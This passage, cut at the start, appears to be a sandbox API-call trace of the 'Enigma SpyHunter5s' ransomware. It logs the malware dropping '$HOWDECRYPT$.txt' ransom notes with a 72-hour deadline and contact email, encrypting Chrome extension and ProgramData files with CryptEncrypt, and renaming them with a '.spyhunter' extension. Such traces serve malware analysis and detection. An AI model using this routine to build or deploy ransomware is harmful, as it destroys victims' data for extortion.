Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.278] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.278] WriteFile (in: hFile=0xa0, lpBuffer=0x248eabf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ebe8, lpOverlapped=0x0 | out: lpBuffer=0x248eabf*, lpNumberOfBytesWritten=0x248ebe8*=0x127, lpOverlapped=0x0) returned 1 [0160.279] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.279] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ebe8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ebe8*=0x2ac, lpOverlapped=0x0) returned 1 [0160.279] CloseHandle (hObject=0xa0) returned 1 [0160.279] GetProcessHeap () returned 0x2c0000 [0160.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19cc8 | out: hHeap=0x2c0000) returned 1 [0160.279] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb88 | out: pbBuffer=0x248eb88) returned 1 [0160.279] GetProcessHeap () returned 0x2c0000 [0160.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.279] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb80*=0x30) returned 1 [0160.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0160.280] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.280] GetProcessHeap () returned 0x2c0000 [0160.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.280] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eb44*=0xbb, lpOverlapped=0x0) returned 1 [0160.281] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.281] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x248eb44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eb44*=0xbb, lpOverlapped=0x0) returned 1 [0160.281] GetProcessHeap () returned 0x2c0000 [0160.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.281] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.282] WriteFile (in: hFile=0xa0, lpBuffer=0x248eb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb44, lpOverlapped=0x0 | out: lpBuffer=0x248eb84*, lpNumberOfBytesWritten=0x248eb44*=0x4, lpOverlapped=0x0) returned 1 [0160.282] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb44*=0x30, lpOverlapped=0x0) returned 1 [0160.282] CloseHandle (hObject=0xa0) returned 1 [0160.282] GetProcessHeap () returned 0x2c0000 [0160.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.282] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 168 [0160.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0160.283] GetProcessHeap () returned 0x2c0000 [0160.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.283] GetProcessHeap () returned 0x2c0000 [0160.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.283] GetProcessHeap () returned 0x2c0000 [0160.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d9f8 | out: hHeap=0x2c0000) returned 1 [0160.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.284] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.284] WriteFile (in: hFile=0xa0, lpBuffer=0x248eab7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ebe0, lpOverlapped=0x0 | out: lpBuffer=0x248eab7*, lpNumberOfBytesWritten=0x248ebe0*=0x127, lpOverlapped=0x0) returned 1 [0160.285] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.285] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ebe0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ebe0*=0x2ac, lpOverlapped=0x0) returned 1 [0160.285] CloseHandle (hObject=0xa0) returned 1 [0160.286] GetProcessHeap () returned 0x2c0000 [0160.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d870 | out: hHeap=0x2c0000) returned 1 [0160.286] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb80 | out: pbBuffer=0x248eb80) returned 1 [0160.286] GetProcessHeap () returned 0x2c0000 [0160.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.286] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb78*=0x30) returned 1 [0160.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0160.287] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.287] GetProcessHeap () returned 0x2c0000 [0160.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.459] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eb3c*=0xb4, lpOverlapped=0x0) returned 1 [0160.460] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.460] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x248eb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eb3c*=0xb4, lpOverlapped=0x0) returned 1 [0160.460] GetProcessHeap () returned 0x2c0000 [0160.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.460] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.460] WriteFile (in: hFile=0xa0, lpBuffer=0x248eb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb3c, lpOverlapped=0x0 | out: lpBuffer=0x248eb7c*, lpNumberOfBytesWritten=0x248eb3c*=0x4, lpOverlapped=0x0) returned 1 [0160.461] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb3c*=0x30, lpOverlapped=0x0) returned 1 [0160.461] CloseHandle (hObject=0xa0) returned 1 [0160.461] GetProcessHeap () returned 0x2c0000 [0160.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.461] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.spyhunter") returned 165 [0160.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0160.463] GetProcessHeap () returned 0x2c0000 [0160.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.463] GetProcessHeap () returned 0x2c0000 [0160.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.463] GetProcessHeap () returned 0x2c0000 [0160.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d6e8 | out: hHeap=0x2c0000) returned 1 [0160.463] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\media player\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.463] GetProcessHeap () returned 0x2c0000 [0160.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9838 | out: hHeap=0x2c0000) returned 1 [0160.463] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.463] GetProcessHeap () returned 0x2c0000 [0160.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9778 | out: hHeap=0x2c0000) returned 1 [0160.463] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb70 | out: pbBuffer=0x248eb70) returned 1 [0160.464] GetProcessHeap () returned 0x2c0000 [0160.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.464] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb68*=0x30) returned 1 [0160.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.464] GetProcessHeap () returned 0x2c0000 [0160.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.464] GetProcessHeap () returned 0x2c0000 [0160.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1c08 | out: hHeap=0x2c0000) returned 1 [0160.464] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb70 | out: pbBuffer=0x248eb70) returned 1 [0160.464] GetProcessHeap () returned 0x2c0000 [0160.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.464] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb68*=0x30) returned 1 [0160.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.464] GetProcessHeap () returned 0x2c0000 [0160.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.464] GetProcessHeap () returned 0x2c0000 [0160.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea96b8 | out: hHeap=0x2c0000) returned 1 [0160.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.465] GetProcessHeap () returned 0x2c0000 [0160.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea95f8 | out: hHeap=0x2c0000) returned 1 [0160.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.465] GetProcessHeap () returned 0x2c0000 [0160.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07f98 | out: hHeap=0x2c0000) returned 1 [0160.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\applicationviewsrootnode\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.465] GetProcessHeap () returned 0x2c0000 [0160.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44628 | out: hHeap=0x2c0000) returned 1 [0160.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\drm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.465] GetProcessHeap () returned 0x2c0000 [0160.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf170 | out: hHeap=0x2c0000) returned 1 [0160.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\drm\\server\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.466] GetProcessHeap () returned 0x2c0000 [0160.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9478 | out: hHeap=0x2c0000) returned 1 [0160.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb58 | out: pbBuffer=0x248eb58) returned 1 [0160.466] GetProcessHeap () returned 0x2c0000 [0160.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.466] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb50*=0x30) returned 1 [0160.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.." (normalized: "c:\\programdata\\microsoft\\drm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.466] GetProcessHeap () returned 0x2c0000 [0160.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.466] GetProcessHeap () returned 0x2c0000 [0160.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a7c8 | out: hHeap=0x2c0000) returned 1 [0160.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb50 | out: pbBuffer=0x248eb50) returned 1 [0160.466] GetProcessHeap () returned 0x2c0000 [0160.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.466] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb48*=0x30) returned 1 [0160.466] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\." (normalized: "c:\\programdata\\microsoft\\drm\\server\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.466] GetProcessHeap () returned 0x2c0000 [0160.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.466] GetProcessHeap () returned 0x2c0000 [0160.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a5e8 | out: hHeap=0x2c0000) returned 1 [0160.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\devicesync\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.467] GetProcessHeap () returned 0x2c0000 [0160.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea93b8 | out: hHeap=0x2c0000) returned 1 [0160.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.467] GetProcessHeap () returned 0x2c0000 [0160.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea92f8 | out: hHeap=0x2c0000) returned 1 [0160.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.467] GetProcessHeap () returned 0x2c0000 [0160.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84bf0 | out: hHeap=0x2c0000) returned 1 [0160.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.467] GetProcessHeap () returned 0x2c0000 [0160.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29458 | out: hHeap=0x2c0000) returned 1 [0160.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb40 | out: pbBuffer=0x248eb40) returned 1 